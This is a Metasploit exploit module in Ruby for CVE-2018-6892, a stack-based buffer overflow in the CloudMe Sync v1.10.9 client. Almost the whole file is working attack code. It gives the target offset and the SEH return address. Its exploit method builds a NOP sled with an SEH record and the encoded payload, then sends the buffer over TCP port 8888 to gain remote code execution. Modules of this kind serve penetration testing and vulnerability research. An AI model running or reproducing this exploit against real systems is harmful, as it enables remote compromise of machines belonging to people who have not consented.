1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Remote::Seh
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'CloudMe Sync v1.10.9',
17
        'Description' => %q{
18
          This module exploits a stack-based buffer overflow vulnerability
19
          in CloudMe Sync v1.10.9 client application. This module has been
20
          tested successfully on Windows 7 SP1 x86.
21
        },
22
        'License' => MSF_LICENSE,
23
        'Author' => [
24
          'hyp3rlinx', # Original exploit author
25
          'Daniel Teixeira' # MSF module author
26
        ],
27
        'References' => [
28
          [ 'CVE', '2018-6892'],
29
          [ 'EDB', '44027' ],
30
        ],
31
        'DefaultOptions' => {
32
          'EXITFUNC' => 'thread'
33
        },
34
        'Platform' => 'win',
35
        'Payload' => {
36
          'BadChars' => "\x00",
37
        },
38
        'Targets' => [
39
          [
40
            'CloudMe Sync v1.10.9',
41
            {
42
              'Offset' => 2232,
43
              'Ret' => 0x61e7b7f6
44
            }
45
          ]
46
        ],
47
        'Privileged' => true,
48
        'DisclosureDate' => '2018-01-17',
49
        'DefaultTarget' => 0,
50
        'Notes' => {
51
          'Reliability' => UNKNOWN_RELIABILITY,
52
          'Stability' => UNKNOWN_STABILITY,
53
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
54
        }
55
      )
56
    )
57

58
    register_options([Opt::RPORT(8888)])
59
  end
60

61
  def exploit
62
    connect
63

64
    buffer = make_nops(target['Offset'])
65
    buffer << generate_seh_record(target.ret)
66
    buffer << payload.encoded
67

68
    sock.put(buffer)
69
    handler
70
  end
71
end
72

73